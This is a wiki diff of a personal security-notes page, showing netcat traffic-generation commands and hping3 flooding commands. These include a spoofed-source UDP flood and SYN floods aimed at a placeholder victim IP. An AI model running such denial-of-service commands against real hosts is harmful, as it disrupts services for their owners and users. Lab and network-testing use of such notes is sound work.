User Tools

Site Tools


security

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
security [2023/04/14 12:53] jotasandokusecurity [2023/11/02 14:38] (current) – external edit 127.0.0.1
Line 7: Line 7:
   nc -luk 192.168.0.112 7777    # listens on UDP   nc -luk 192.168.0.112 7777    # listens on UDP
   nc -uv 192.168.0.112 7777    # opens terminal so we can send datagrams   nc -uv 192.168.0.112 7777    # opens terminal so we can send datagrams
 +  while true; do dd if=/dev/urandom bs=1400 | pv -L 10M | nc 10.80.8.1 4444; done    # to generate traffic. We can omit the pv bit 
      
      
Line 55: Line 56:
   hping3 --flood --spoof <spoofed-ip> --udp -p 53 <victim-ip>    hping3 --flood --spoof <spoofed-ip> --udp -p 53 <victim-ip> 
   hping3 --syn --flood <spoofed-ip> --udp -p 53 <victim-ip>    # SYN attack   hping3 --syn --flood <spoofed-ip> --udp -p 53 <victim-ip>    # SYN attack
 +  hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source # SYN-flood (datagram 120B)
      
  
security.1681476824.txt.gz · Last modified: (external edit)